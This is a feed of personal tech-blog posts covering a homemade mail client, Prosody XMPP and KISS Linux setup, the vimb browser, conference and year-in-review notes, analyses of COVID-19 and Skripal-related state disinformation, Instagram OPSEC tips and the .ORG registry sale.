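while read -rp 'mael> ' cmd arg; do
    case "$cmd" in
        read) ./mael-parser "$maildir/$arg" | less ;;  # Python renders, less displays
        q|quit) break ;;
        *) printf 'unknown command: %s\n' "$cmd" ;;
    esac
done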

These kinds of one-way (bash -> Python) calls are what drive the entire process. I’m not sure what to think of it. Perhaps I might just give up and write the entire thing in Python. Or…I might just scrap this entirely and just shut up and use aerc. I don’t know yet. The code does seem to be growing in size rapidly. It’s about ~350 LOC in two days of writing (Python + bash). New problems arise every now and then and it’s pretty hard to keep track of all of this. It’ll be cool when it’s all done though (I think).

If only things just worked.


  1. I have yet to open source it; this post will be updated with a link to it when I do. 

https://icyphox.sh/blog/mael (Sun, 29 Mar 2020)

COVID-19 disinformation

The virus spreads around the world, along with a bunch of disinformation and potential malware / phishing campaigns. There are many actors, pushing many narratives—some similar, some different.

Interestingly, the three big players in the information warfare space—Russia, Iran and China—seem to be running similar stories on their state-backed media outlets. While they all tend to lean towards the same, fairly anti-U.S. sentiments—that is, blaming the US for weaponizing the crisis for political gain—Iran’s and Russia’s content comes off as more…conspiratorial. In essence, they claim that the COVID-19 virus is a “bioweapon” developed by the U.S.

Russian news agency RT tweeted:

Show of hands, who isn’t going to be surprised if it ever gets revealed that #coronavirus is a bioweapon?

RT also published an article mocking the U.S. for concerns over Russian disinformation. Another article by RT, an op-ed, suggests the virus’s impact on financial markets might bring about the reinvention of communism and the end of the global capitalist system. Russian state-sponsored media can also be seen amplifying Iranian conspiracy theories—including the Islamic Revolutionary Guard Corps’ (IRGC) suggestion that COVID-19 is a U.S. bioweapon.

Iranian media outlets appear to be running stories with similar themes, as well. Here’s one by PressTV, where they very boldly claim that the virus was developed by the U.S. and/or Israel, to use as a bioweapon against Iran. Another nonsensical piece by PressTV suggests that “there are components of the virus that are related to HIV that could not have occurred naturally”. The same article pushes another theory:

There has been some speculation that as the Trump Administration has been constantly raising the issue of growing Chinese global competitiveness as a direct threat to American national security and economic dominance, it might be possible that Washington has created and unleashed the virus in a bid to bring Beijing’s growing economy and military might down a few notches. It is, to be sure, hard to believe that even the Trump White House would do something so reckless, but there are precedents for that type of behavior

These “theories”, as is evident, are getting wilder and wilder.

Unsurprisingly, China produces the most content related to the coronavirus, but its stories are quite distinct from Russian and Iranian media’s. The general theme behind Chinese narratives is criticizing the West for…a lot of things.

Global Times claims that democracy is an insufficient system to battle the coronavirus. They blame the U.S. for unfair media coverage against China, and other anti-China narratives. There are a ton of other articles that play the racism/discrimination card—I wouldn’t blame them though. Here’s one.

In the case of India, the disinfo (actually, misinfo) is mostly just pseudoscience / alternative medicine / cures in the form of WhatsApp forwards—“Eat foo! Eat bar!”.1

I’ve also been noticing a ton of COVID-19 / coronavirus related domain registrations happening. Expect phishing and malware campaigns using the virus as a theme. In the past 24 hrs, ~450 .com domains alone were registered.

corona domains

Anywho, there are bigger problems at hand—like the fact that my uni still hasn’t suspended classes!

https://icyphox.sh/blog/covid19-disinfo (Sun, 15 Mar 2020)

Nullcon 2020

Disclaimer: Political.

This year’s conference was at the Taj Hotel and Convention center, Dona Paula, and its associated party at Cidade de Goa, also by Taj. Great choice of venue, perhaps even better than last time. The food was fine, the views were better.

With those things out of the way—let’s talk talks. I think I preferred the panels to the talks—I enjoy a good, stimulating discussion as opposed to only half-understanding a deeply technical talk—but that’s just me. But there was this one talk that I really enjoyed, perhaps due to its unintended comedic value; I’ll get into that later.

The list of panels/talks I attended in order:

Day 1

  • Keynote: The Metadata Trap by Micah Lee (Talk)
  • Securing the Human Factor (Panel)
  • Predicting Danger: Building the Ideal Threat Intelligence Model (Panel)
  • Lessons from the Cyber Trenches (Panel)
  • Mlw 41#: a new sophisticated loader by APT group TA505 by Alexey Vishnyakov (Talk)
  • Taking the guess out of Glitching by Adam Laurie (Talk)
  • Keynote: Cybersecurity in India—Information Assymetry, Cross Border Threats and National Sovereignty by Saumil Shah (Talk)

Day 2

  • Keynote: Crouching hacker, killer robot? Removing fear from cyber-physical security by Stefano Zanero (Talk)
  • Supply Chain Security in Critical Infrastructure Systems (Panel)
  • Putting it all together: building an iOS jailbreak from scratch by Umang Raghuvanshi (Talk)
  • Hack the Law: Protection for Ethical Cyber Security Research in India (Panel)

Re: Closing keynote

I wish I could link the talk, but it hasn’t been uploaded just yet. I’ll do it once it has. So, I’ve a few comments I’d like to make on some of Saumil’s statements.

He proposed that the security industry trust the user more, and let them make the decisions pertaining to personal security / privacy. Except…that’s just not going to happen. If all users were capable of making good, security-first choices, we as an industry wouldn’t need to exist. But that is unfortunately not the case. Users are dumb. They value convenience and immediacy over security. That’s the sad truth of the modern age.

Another thing he proposed was that the Indian Government build our own “Military Grade” and “Consumer Grade” encryption.

…what?

A “security professional” suggesting that we roll our own crypto? What even. Oh, and to top it off—when Raman very rightly countered, saying that the biggest opponent to encryption is the Government, and trusting them to build safe cryptosystems is probably not wise, he responded by saying something to the effect of “Eh, who cares? If they want to backdoor it, let them.”

Bruh moment.

He also had some interesting things to say about countering disinformation. He said, and I quote “Join the STFU University”.

¿wat? Is that your best solution?

Judging by his profile, and certain other things he said in the talk, it is safe to conclude that his ideals are fairly…nationalistic. I’m not one to police political opinions, I couldn’t care less which way you lean, but the statements made in the talk were straight up incorrect.

Closing thoughts

This came out more rant-like than I’d intended. It is also the first blog post where I dip my toes into politics. I’ve some thoughts on more controversial topics for my next entry. That’ll be fun, especially when my follower count starts dropping. LULW.

Saumil, if you ever end up reading this, note that this is not a personal attack. I think you’re a cool guy.

Note to the Nullcon organizers: you guys did a fantastic job running the conference despite Corona-chan’s best efforts. I’d like to suggest one little thing though—please VET YOUR SPEAKERS more!

group pic

https://icyphox.sh/blog/nullcon-2020 (Mon, 09 Mar 2020)

Setting up Prosody for XMPP

Remember the IRC for DMs article I wrote a while back? Well…it’s safe to say that IRC didn’t hold up too well. It first started with the bot. Buggy code, crashed a lot—we eventually gave up and didn’t bring the bot back up. Then came the notifications, or lack thereof. Revolution IRC has a bug where your custom notification rules just get ignored after a while. In my case, this meant that notifications for #crimson stopped entirely. Unless, of course, Nerdy pinged me each time.

Again, none of these problems are inherent to IRC itself. IRC is fantastic, but perhaps wasn’t the best fit for our usecase. I still do use IRC though, just not for 1-on-1 conversations.

Why XMPP?

For one, it’s better suited for 1-on-1 conversations. It also has support for end-to-end encryption (via OMEMO), something IRC doesn’t have.1 Also, it isn’t centralized (think: email).

So…Prosody

Prosody is an XMPP server. Why did I choose this over ejabberd, OpenFire, etc.? No reason, really. Their website looked cool, I guess.

Installing

Setting it up was pretty painless (I’ve experienced worse). If you’re on a Debian-derived system, add:

# modify according to your distro
deb https://packages.prosody.im/debian buster main 

to your /etc/apt/sources.list, and:

# apt update
# apt install prosody

Configuring

Once installed, you will find the config file at /etc/prosody/prosody.cfg.lua. Add your XMPP user (we will make this later), to the admins = {} line.

admins = {"user@chat.example.com"}

Head to the modules_enabled section, and add this to it:

modules_enabled = {
    "posix";
    "omemo_all_access";
...
    -- uncomment these
    "groups";
    "mam";
    -- and any others you think you may need
}

We will install the omemo_all_access module later.

Set c2s_require_encryption, s2s_require_encryption, and s2s_secure_auth to true. Set the pidfile to /tmp/prosody.pid (or just leave it as default?).

By default, Prosody stores passwords in plain text, so fix that by setting authentication to "internal_hashed".

Head to the VirtualHost section, and add your vhost. Right above it, set the path to the HTTPS certificate and key:

certificates = "certs"    -- relative to your config file location
https_certificate = "certs/chat.example.com.crt"
https_key = "certs/chat.example.com.key"
...

VirtualHost "chat.example.com"

I generated these certs using Let’s Encrypt’s certbot, you can use whatever. Here’s what I did:

# certbot --nginx -d chat.example.com

This generates certs at /etc/letsencrypt/live/chat.example.com/. You can trivially import these certs into Prosody’s /etc/prosody/certs/ directory using:

# prosodyctl cert import /etc/letsencrypt/live/chat.example.com

Plugins

All the modules for Prosody can be hg clone’d from https://hg.prosody.im/prosody-modules. You will, obviously, need Mercurial installed for this.

Clone it somewhere, and:

# cp -R prosody-modules/mod_omemo_all_access /usr/lib/prosody/modules

Do the same thing for whatever other module you choose to install. Don’t forget to add it to the modules_enabled section in the config.

Adding users

prosodyctl makes this a fairly simple task:

$ prosodyctl adduser user@chat.example.com

You will be prompted for a password. You can, optionally, enable user registrations from XMPP/Jabber clients (security risk!) by setting allow_registration = true.

I may have missed something important, so here’s my config for reference.

Closing notes

That’s pretty much all you need for 1-on-1 E2EE chats. I don’t know much about group chats just yet—trying to create a group in Conversations gives a “No group chat server found”. I will figure it out later.

Another thing that doesn’t work in Conversations is adding an account using an SRV record.2 Which kinda sucks, because having a chat. subdomain isn’t very clean, but whatever.
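
For reference, that login method relies on DNS SRV records; you can check whether yours resolve with dig (domain names here are placeholders):

$ dig +short _xmpp-client._tcp.example.com SRV
0 5 5222 chat.example.com.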

Oh, also—you can message me at icy@chat.icyphox.sh.


  1. I’m told IRC supports OTR, but I haven’t ever tried. 

  2. https://prosody.im/doc/dns 

https://icyphox.sh/blog/prosody (Tue, 18 Feb 2020)

Status update

It’s only been two weeks since I got back to campus, and we’ve already got our first round of cycle tests starting this Tuesday. Granted, I returned a week late, but…that’s nuts!

We’re two whole weeks into 2020; I should’ve been working on something status update worthy, right? Not really, but we’ll see.

No more Cloudflare!

Yep. If you weren’t aware—pre-2020, this site was behind Cloudflare SSL and their DNS. I have since migrated off it to he.net, thanks to a highly upvoted Lobste.rs comment. Because of this switch, I in fact learnt a ton about DNS.

Migrating to HE was very painless, but I did have to research a lot about PTR records—Cloudflare kinda dumbs it down. In my case, I had to rename my DigitalOcean VPS instance to the FQDN, which then automagically created a PTR record at DO’s end.
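
Verifying the reverse record afterwards is a one-liner (the address is a placeholder for your VPS's IP):

$ dig -x 203.0.113.7 +short
icyphox.sh.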

I dropped icyrc

The IRC client I was working on from the end of last December through early January? Yeah, I lost interest. Apparently writing C and ncurses isn’t very fun or stimulating.

This also means I’m back on weechat. Until I find another client that plays well with ZNC, that is.

KISS stuff

I now maintain two new packages in the KISS community repository—2bwm and aerc! The KISS package system is stupid simple to work with. Creating packages has never been easier.

icyphox.sh/friends

Did you notice that yet? I’ve been curating a list of people I know IRL and online, and linking to their online presence. This is like a webring of sorts, and promotes inter-site traffic—making the web more “web” again.

If you know me, feel free to hit me up and I’ll link your site too! My apologies if I’ve forgotten your name.

Patreon!

Is this big news? I dunno, but yes—I now have a Patreon. I figured I’d cash in on the newfound traffic my site’s been getting. There won’t be any exclusive content or any tiers or whatever. Nothing will change. Just a place for y’all to toss me some $$$ if you wish to do so. ;)

Oh, and it’s at patreon.com/icyphox.

Misc.

The Stormlight Archive is likely the best epic I have ever read till date. I’m still not done yet; about 500 odd pages to go as of this writing. But wow, Brandon really does know how to build worlds and magic systems. I cannot wait to read all about the cosmere.

I have also been working out for the past month or so. I can see them gainzzz. I plan to keep track of my progress, I just don’t know how to quantify it. Perhaps I’ll log the number of reps × sets I do each time, and with what weights. I can then look back to see if either the weights have increased since, or the number of reps × sets have. If you know of a better way to quantify progress, let me know! I’m pretty new to this.

https://icyphox.sh/blog/2020-01-18 (Sat, 18 Jan 2020)

Vimb: my Firefox replacement

After having recently installed KISS, and building Firefox from source, I was exposed to the true monstrosity that Firefox—and web browsers in general—is. It took all of 9 hours to build the dependencies and then Firefox itself.

Sure, KISS now ships Firefox binaries in the firefox-bin package; I decided to get rid of that slow mess anyway.

Enter vimb

vimb is a browser based on webkit2gtk, with a Vim-like interface. webkit2gtk builds in less than a minute—it blows Firefox out of the water, on that front.

There isn’t much of a UI to it—if you’ve used Vimperator/Pentadactyl (Firefox plugins), vimb should look familiar to you. It can be configured via a config.h or a text-based config file at ~/.config/vimb/config. Each “tab” opens a new instance of vimb in a new window, but this can get messy really fast if you have a lot of tabs open.

Enter tabbed

tabbed is a tool to embed X apps which support xembed into a tabbed UI. This can be used in conjunction with vimb, like so:

tabbed vimb -e

Where the -e flag is populated with the XID, by tabbed. Configuring Firefox-esque keybinds in tabbed’s config.h is relatively easy. Once that’s done—voilà! A fairly sane, Vim-like browsing experience that’s faster and has a smaller footprint than Firefox.

Ad blocking

Ad blocking support isn’t built-in and there is no plugin system available. There are two options for ad blocking:

  1. wyebadblock
  2. /etc/hosts
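
The hosts-file route is as low-tech as it gets: point known ad and tracker domains at nothing. One commonly used list is Steven Black's (the URL below is correct to the best of my knowledge; eyeball the file before appending it):

# keep a backup, then append a curated blocklist (run as root)
cp /etc/hosts /etc/hosts.orig
curl -sL https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts >> /etc/hosts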

Caveats

Some websites tend to not work because they detect vimb as an older version of Safari (same web engine). This is a minor inconvenience, and not a dealbreaker for me. I also cannot log in to Google’s services for some reason, which is mildly annoying, but it’s good in a way—I am now further incentivised to dispose of my Google account.

And here’s the screenshot y’all were waiting for:

vimb

https://icyphox.sh/blog/mnml-browsing (Thu, 16 Jan 2020)

Five days in a TTY

This new semester has been pretty easy on me, so far. I hardly ever have any classes (again, so far), and I’ve a ton of free time on my hands. This calls for—yep—a distro hop!

Why KISS?

KISS has been making rounds on the interwebz lately.1 The Hacker News post spurred quite the discussion. But then again, that is to be expected from Valleybros who use macOS all day. :^)

From the website,

An independent Linux® distribution with a focus on simplicity and the concept of “less is more”. The distribution targets only the x86-64 architecture and the English language.

“Simplicity” here is not to be confused with “ease”, as many people in the HN thread did. It is instead simplicity in terms of lesser and cleaner code—no Poetterware.

This, I can get behind. A clean system with less code is like a clean table. It’s nice to work on. It also implies security to a certain extent since there’s a smaller attack surface.

The kiss package manager is written in pure POSIX sh, and does just enough. Packages are compiled from source and kiss automatically performs dependency resolution. Creating packages is ridiculously easy too.

Speaking of packages, all packages—both official & community repos—are run through shellcheck before getting merged. This is awesome; I don’t think this is done in any other distro.

In essence, KISS sucks less.

Installing KISS

The install guide is very easy to follow. Clear instructions that make it hard to screw up; that didn’t stop me from doing so, however.

Day 1

Although technically not in a TTY, it was still not in the KISS system—I’ll count it. I’d compiled the kernel in the chroot and decided to use efibootmgr instead of GRUB. efibootmgr is a neat tool for managing UEFI boot entries. Essentially, you boot the .efi directly, as opposed to picking a boot entry through GRUB. Useful if you have just one OS on the system. Removes one layer of abstraction.

Adding a new EFI entry is pretty easy. For me, the command was:

efibootmgr --create \
           --disk /dev/nvme0n1 \
           --part 1 \
           --label "KISS Linux" \
           --loader /vmlinuz \
           --unicode 'root=/dev/nvme0n1p3 rw'  # kernel parameters

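For reference, efibootmgr -v lists the existing entries, and a botched one can be removed with the -b/-B flags (the boot number below is just an example):

efibootmgr -v                # list current boot entries
efibootmgr -b 0003 -B        # delete entry Boot0003
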
Mind you, this didn’t work the first time, or the second, or the third … a bunch of trial and error (and asking on #kisslinux) later, it worked.

Well, it booted, but not into KISS. Took a while to figure out that the culprit was CONFIG_BLK_DEV_NVME not having been set in the kernel config. Rebuild & reboot later, I was in.
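
For the record, enabling NVMe block device support in the kernel config is a one-liner:

CONFIG_BLK_DEV_NVME=y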

Day 2

Networking! How fun. An ip a and I see that both USB tethering (ethernet) and wireless don’t work. Great. Dug around a bit—missing wireless drivers were the problem. Found my driver, a binary .ucode from Intel (eugh!). The whole day was spent figuring out why the kernel would never load the firmware. I tried different variations—loading it as a module (=m), baking it in (=y)—but no luck.
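
For the record, the two variations boil down to a few lines in the kernel config; roughly the following, with the .ucode filename being whatever the card needs (the one below is just an example):

# driver as a module; firmware is loaded from /lib/firmware at runtime
CONFIG_IWLWIFI=m

# or: build the driver in and embed the firmware blob into the kernel image
CONFIG_IWLWIFI=y
CONFIG_EXTRA_FIRMWARE="iwlwifi-8265-36.ucode"
CONFIG_EXTRA_FIRMWARE_DIR="/lib/firmware"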

Day 3

I then tried Alpine’s kernel config, but that was huge, had a ton of modules, and took far too long to build each time, much to my annoyance. Diffing their config against mine gave ~3000 lines! Too much to sift through. On a whim, I decided to scrap my entire KISS install and start afresh.

For some odd reason, after doing the exact same things I’d done earlier, my wireless worked this time. Ethernet didn’t, and still doesn’t, but that’s ok.

Building xorg-server was next, which took about an hour, mostly thanks to spotty internet. The build went through fine; what wasn’t fine was the complete lack of input after starting X. Adding my user to the input group wasn’t enough. The culprit this time was a missing xf86-xorg-input package. Installing that gave me my mouse back, but not the keyboard!

It was definitely not the kernel this time, because I had a working keyboard in the TTY.

Day 4 & Day 5

This was probably the most annoying of all, since the fix was trivial. By this point I had exhausted all ideas, so I decided to build my essential packages and set up my system. Building Firefox took nearly 9 hours; the rest was much faster.

I was still chatting on IRC during this, trying to zero down on what the problem could be. And then:

<dylanaraps> For starters I think st fails due to no fonts.

Holy shit! Fonts. I hadn’t installed any fonts. Which is why none of the applications I tried launching via sowm ever launched, and hence, I was led to believe my keyboard was dead.

Worth it?

Absolutely. I cannot stress enough how much of a learning experience this was. Also a test of my patience and perseverance, but yeah ok. I also think that this distro is my endgame (yeah, right), probably because other distros will be nothing short of disappointing, in one way or another.

Huge thanks to the folks at #kisslinux on Freenode for helping me throughout. And I mean, they really did. We chatted for hours on end trying to debug my issues.

I’ll now conclude with an obligatory screenshot.

scrot

]]>
https://icyphox.sh/blog/five-days-ttyMon, 13 Jan 2020 00:00:00 +0000https://icyphox.sh/blog/five-days-tty
2019 in reviewJust landed in a rainy Chennai, back in campus for my 6th semester. A little late to the “year in review blog post” party; travel took up most of my time. Last year was pretty eventful (at least in my books), and I think I did a bunch of cool stuff—let’s see!

Interning at SecureLayer7

Last summer, I interned at SecureLayer7, a security consulting firm in Pune, India. My work was mostly in hardware and embedded security research. I learnt a ton about ARM and MIPS reversing and exploitation, UART and JTAG, firmware RE and enterprise IoT security.

I also earned my first CVE! I’ve written about it in detail here.

Conferences

I attended two major conferences last year—Nullcon Goa and PyCon India. Both super fun experiences and I met a ton of cool people! Nullcon Twitter thread and PyCon blog post.

Talks

I gave two talks last year:

  1. Intro to Reverse Engineering at Cyware 2019
  2. "Smart lock? Nah dude." at PyCon India

Things I made

Not in order, because I CBA:

  • repl: More of a quick bash hack, I don’t really use it.
  • pw: A password manager. This, I actually do use. I’ve even written a tiny dmenu wrapper for it.
  • twsh: An incomplete twtxt client, in bash. I have yet to get around to finishing it.
  • alpine ports: My APKBUILDs for Alpine.
  • detotated: An IRC bot written in Python. See IRC for DMs.
  • icyrc: A no bullshit IRC client, because WeeChat is bloat.

I probably missed something, but whatever.

Blog posts

$ ls -1 pages/blog/*.md | wc -l
20

So excluding today’s post, and _index.md, that’s 18 posts! I had initially planned to write one post a month, but hey, this is great. My plan for 2020 is to write one post a week—unrealistic, I know, but I will try nevertheless.

I wrote about a bunch of things, ranging from programming to return-oriented-programming (heh), sysadmin and security stuff, and a hint of culture and philosophy. Nice!

The Python for Reverse Engineering post got a ton of attention on the interwebz, so that was cool.

Bye 2019

2019 was super productive! (in my terms). I learnt a lot of new things last year, and I can only hope to learn as much in 2020. :)

I’ll see you next week.

]]>
https://icyphox.sh/blog/2019-in-reviewThu, 02 Jan 2020 00:00:00 +0000https://icyphox.sh/blog/2019-in-review
Disinfo war: RU vs GBThis entire sequence of events begins with the attempted poisoning of Sergei Skripal1, an ex-GRU officer who was a double agent for the UK’s intelligence services. This hit attempt happened on the 4th of March, 2018. Eight days later, then-Prime Minister Theresa May formally accused Russia of the attack.

The toxin used in the poisoning was a nerve agent called Novichok. In addition to the British military-research facility at Porton Down, a small number of labs around the world were tasked by the OPCW (Organisation for the Prohibition of Chemical Weapons) with confirming Porton Down’s conclusions on the toxin that was used.

With the background on the matter out of the way, here are the different instances of well timed disinformation pushed out by Moscow.

The Russian offense

April 14, 2018

  • RT published an article claiming that Spiez (the Swiss lab involved in the testing) had identified a different toxin—BZ, and not Novichok.
  • This was an attempt to shift the blame from Russia (origin of Novichok), to NATO countries, where it was apparently in use.
  • Most viral piece on the matter in all of 2018.

Although technically correct, this isn’t the entire truth. As part of protocol, the OPCW added a new substance to the sample as a test. If any of the labs failed to identify this substance, their findings were deemed untrustworthy. This toxin was a derivative of BZ.

Here are a few interesting things to note:

  1. The entire process starting with the OPCW and the labs is top-secret. How did Russia even know Spiez was one of the labs?
  2. On April 11th, the OPCW mentioned BZ in a report confirming Porton Down’s findings. Note that Russia is a part of the OPCW, and is fully aware of the quality control measures in place. Surely they knew the reason for BZ’s use?

Regardless, the Russian version of the story spread fast. They cashed in on two major factors to plant this disinfo:

  1. “NATO bad”: Overused, but surprisingly works. People love a story that goes full 180°.
  2. Spiez can’t defend itself: At the risk of revealing that it was one of the facilities testing the toxin, Spiez was only able to “not comment”.

April 3, 2018

  • The Independent publishes a story based on an interview with the chief executive of Porton Down, Gary Aitkenhead.
  • Aitkenhead says they’ve identified Novichok but “have not identified the precise source”.
  • Days earlier, Boris Johnson (then-Foreign Secretary) claimed that Porton Down confirmed the origin of the toxin to be Russia.
  • This discrepancy was immediately promoted by Moscow, and its network all over.

This one is especially interesting because of how simple it is to exploit a small contradiction, that could’ve been an honest mistake. This episode is also interesting because the British actually attempted damage control this time. Porton Down tried to clarify Aitkenhead’s statement via a tweet2:

Our experts have precisely identified the nerve agent as a Novichok. It is not, and has never been, our responsibility to confirm the source of the agent @skynews @UKmoments

Quoting the Defense One article on the matter:

The episode is seen by those inside Britain’s security communications team as the most serious misstep of the crisis, which for a period caused real concern. U.K. officials told me that, in hindsight, Aikenhead could never have blamed Russia directly, because that was not his job—all he was qualified to do was identify the chemical. Johnson, in going too far, was more damaging. Two years on, he is now prime minister.

May 2018

  • OPCW facilities receive an email from Spiez inviting them to a conference.
  • The conference itself is real, and has been organized before.
  • The email, however, was not—attached was a Word document containing malware.
  • There were also inconsistencies in the email’s formatting, compared to what was normal.

This spearphishing campaign was never officially attributed to Moscow, but there are a lot of tells here that point to it being the work of a state actor:

  1. Attack targeting a specific group of individuals.
  2. Relatively high level of sophistication—email formatting, malicious Word doc, etc.

However, the British NCSC has assessed with “high confidence” that the attack was perpetrated by the GRU. In UK intelligence parlance, “highly likely” / “high confidence” usually means “definitely”.

Britain’s defense

September 5, 2018

The UK took a lot of hits in 2018, but they eventually came back:

  • Metropolitan Police has a meeting with the press, releasing their findings.
  • CCTV footage showing the two Russian hitmen was released.
  • Traces of Novichok identified in their hotel room.

This sudden news explosion from Britain’s side completely bulldozed the information space pertaining to the entire event. According to Defense One:

Only two of the 10 most viral stories in the weeks following the announcement were sympathetic to Russia, according to NewsWhip. Finally, officials recalled, it felt as though the U.K. was the aggressor. “This was all kept secret to put the Russians on the hop,” one told me. “Their response was all over the place from this point. It was the turning point.”

Earlier, in April, 4 GRU agents were arrested by Dutch security in the Netherlands; they were there to execute a cyber operation against the OPCW (located in The Hague) via its WiFi networks. They were later identified as belonging to Unit 26165, and a bunch of equipment was seized from their room and car.

The abandoned equipment revealed that the GRU unit involved had sent officers around the world to conduct similar cyberattacks. They had been in Malaysia trying to steal information about the investigation into the downed Malaysia Airlines Flight 17, and at a hotel in Lausanne, Switzerland, where a World Anti-Doping Agency (WADA) conference was taking place as Russia faced sanctions from the International Olympic Committee. Britain has said that the same GRU unit attempted to compromise Foreign Office and Porton Down computer systems after the Skripal poisoning.

October 4, 2018

The UK made the arrests public and published a list of infractions committed by Russia, along with the specific GRU unit that was caught.

During this period, just one of the top 25 viral stories was from a pro-Russian outlet, RT—that too a fairly straightforward piece.

Wrapping up

As with conventional warfare, it’s hard to determine who won. Britain may have had the last blow, but Moscow—yet again—displayed their finesse in information warfare. Their ability to seize unexpected openings, gather intel to facilitate their disinformation campaigns, and bring their cyber capabilities to bear makes them a formidable threat.

2020 will be fun, to say the least.

]]>
https://icyphox.sh/blog/ru-vs-gbThu, 12 Dec 2019 00:00:00 +0000https://icyphox.sh/blog/ru-vs-gb
Instagram OPSECWhich I am not, of course. But seeing as most of my peers are, I am compelled to write this post. Using a social platform like Instagram automatically implies that the user understands (to some level) that their personally identifiable information is exposed publicly, and they sign up for the service understanding this risk—or I think they do, anyway. But that’s about it, they go ham after that. Sharing every nitty gritty detail of their private lives without understanding the potential risks of doing so.

The fundamentals of OPSEC dictate that you develop a threat model, and Instagrammers are obviously incapable of doing that—so I’ll do it for them.

Your average Instagrammer’s threat model

I stress the word “average”, as in this doesn’t apply to those with more than a couple thousand followers. Those types of accounts inherently face different kinds of threats—those that come with having a celebrity status, and are not in scope of this analysis.

  • State actors: This doesn’t really fit into our threat model, since our target demographic is simply not important enough. That said, there are select groups of individuals that operate on Instagram1, and they can potentially be targeted by a state actor.

  • OSINT: This is probably the biggest threat vector, simply because of the amount of visual information shared on the platform. A lot can be gleaned from one simple picture in a nondescript alleyway. We’ll get into this in the DOs and DON’Ts in a bit.

  • Facebook & LE: Instagram is the last place you want to be doing an illegal, because well, it’s logged and more importantly—not end-to-end encrypted. Law enforcement can subpoena any and all account information. Quoting Instagram’s page on this:

a search warrant issued under the procedures described in the Federal Rules of Criminal Procedure or equivalent state warrant procedures upon a showing of probable cause is required to compel the disclosure of the stored contents of any account, which may include messages, photos, comments, and location information.

That out of the way, here’s a list of DOs and DON’Ts to keep in mind while posting on Instagram.

DON’Ts

  • Use Instagram for planning and orchestrating illegal shit! I’ve explained why this is a terrible idea above. Use secure comms—even WhatsApp is a better choice, if you have nothing else. In fact, try avoiding IG DMs altogether, use alternatives that implement E2EE.

  • Film live videos outside. Or try not to, if you can. You might unknowingly include information about your location: street signs, shops etc. These can be used to ascertain your current location.

  • Film live videos in places you visit often. This compromises your security at places you’re bound to be at.

  • Share your flight ticket in your story! I can’t stress this enough!!! Summer/winter break? “Look guys, I’m going home! Here’s where I live, and here’s my flight number—feel free to track me!”. This scenario is especially worrisome because the start and end points are known to the threat actor, and your arrival time can be trivially looked up—thanks to the flight number on your ticket. So, just don’t.

  • Post screenshots with OS-specific details. This might border on pedantic, but better safe than sorry. Your phone’s statusbar and navbar are better cropped out of pictures. They reveal the time, notifications (apps that you use), and can be used to identify your phone’s operating system. Besides, the status/nav bar isn’t very useful to your screenshot anyway.

  • Share your voice. In general, reduce your footprint on the platform that can be used to identify you elsewhere.

  • Think you’re safe if your account is set to private. It doesn’t take much to get someone who follows you to show your profile on their device.

DOs

  • Post pictures that pertain to a specific location, once you’ve moved out of the location. Also applies to stories. It can wait.

  • Post pictures that have been shot indoors. Or try to; reasons above. Who woulda thunk I’d advocate bathroom selfies?

  • Delete old posts that are irrelevant to your current audience. Your friends at work don’t need to know about where you went to high school.

More DON’Ts than DOs, that’s very telling. Here are a few more points that are good OPSEC practices in general:

  • Think before you share. Does it conform to the rules mentioned above?
  • Compartmentalize. Separate as much as you can from what you share online, from what you do IRL. Limit information exposure.
  • Assess your risks: Do this often. People change, your environments change, and consequently the risks do too.

Fin

Instagram is—much to my dismay—far too popular for it to die any time soon. There are plenty of good reasons to stop using the platform altogether (hint: Facebook), but that’s a discussion for another day.

Or be like me:

0 posts lul

And that pretty much wraps it up, with a neat little bow.


  1. https://darknetdiaries.com/episode/51/—Jack talks about Indian hackers who operate on Instagram. 

]]>
https://icyphox.sh/blog/ig-opsecMon, 02 Dec 2019 00:00:00 +0000https://icyphox.sh/blog/ig-opsec
Save .ORG!The .ORG top-level domain, introduced in 1985, has been operated by the Public Interest Registry since 2003. The .ORG TLD is used primarily by communities, free and open source projects, and other non-profit organizations—although the use of the TLD isn’t restricted to non-profits.

The Internet Society (ISOC), the group that created the PIR, has decided to sell the registry to a private equity firm—Ethos Capital.

What’s the problem?

There are around 10 million .ORG domains registered, and a good portion of them belong to non-profits and non-governmental organizations. As the name suggests, they don’t earn any profits, and their operations rely on a thin inflow of donations. A private firm having control of the .ORG registry gives them the power to make decisions that would be unfavourable to the .ORG community:

  • They control the registration/renewal fees of the TLD. They can hike the price if they wish to. As it stands, NGOs already earn very little—a .ORG price hike would put them in a very icky situation.

  • They can introduce Rights Protection Mechanisms or RPMs, which are essentially legal statements that can—if not correctly developed—jeopardize / censor completely legal non-profit activities.

  • Lastly, they can suspend domains at the whim of state actors. It isn’t news that nation states go after NGOs, targeting them with allegations of illegal activity. The registry being a private firm only simplifies the process.

Sure, these are just “what ifs” and speculations, but the risk is real. Such power can be abused, and this would be severely detrimental to NGOs globally.

How can I help?

We need to get the ISOC to stop the sale. Head over to https://savedotorg.org and sign their letter. An email is sent on your behalf to:

  • Andrew Sullivan, CEO, ISOC
  • Jon Nevett, CEO, PIR
  • Maarten Botterman, Board Chair, ICANN
  • Göran Marby, CEO, ICANN

Closing thoughts

The Internet that we all love and care for is slowly being subsumed by megacorps and private firms, whose only motive is to make a profit. The Internet was meant to be free, and we’d better act now if we want that freedom. The future looks bleak—I hope we aren’t too late.

]]>
https://icyphox.sh/blog/save-orgSat, 23 Nov 2019 00:00:00 +0000https://icyphox.sh/blog/save-org
Status updateThis month is mostly just unfun stuff, lined up in a neat schedule -- exams. I get all these cool ideas for things to do, and it’s always during exams. Anyway, here’s a quick update on what I’ve been up to.

Blog post queue

I realized that I could use this site’s repo’s issues to track blog post ideas. I’ve made a few, mostly just porting them over from my Google Keep note.

This method of using issues is great, because readers can chime in with ideas for things I could possibly discuss—like in this issue.

Contemplating a vite rewrite

vite, despite what the name suggests, is awfully slow. Also, Python is bloat. Will rewriting it fix that? That’s what I plan to find out. I have a few choices of languages for the rewrite:

  • C: Fast, compiled. Except I suck at it. (cite?)
  • Nim: My favourite, but I’ll have to write bindings to lowdown(1). (nite?)
  • Shell: Another favourite, muh “minimalsm”. No downside, really. (shite?)

Oh, and did I mention—I want it to be compatible with vite. I don’t want to have to redo my site structure or its templates. At the moment, I rely on Jinja2 for templating, so I’ll need something similar.

IRC bot

My earlier post on IRC for DMs got quite a bit of traction, which was pretty cool. I didn’t really talk much about the bot itself though; I’m dedicating this section to detotated.1

Fairly simple Python code, using plain sockets. So far, we’ve got a few basic features in place:

  • .np command: queries the user’s last.fm to get the currently playing track
  • Fetches the URL title, when a URL is sent in chat

That’s it, really. I plan to add a .nps, or “now playing Spotify” command, since we share Spotify links pretty often.
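
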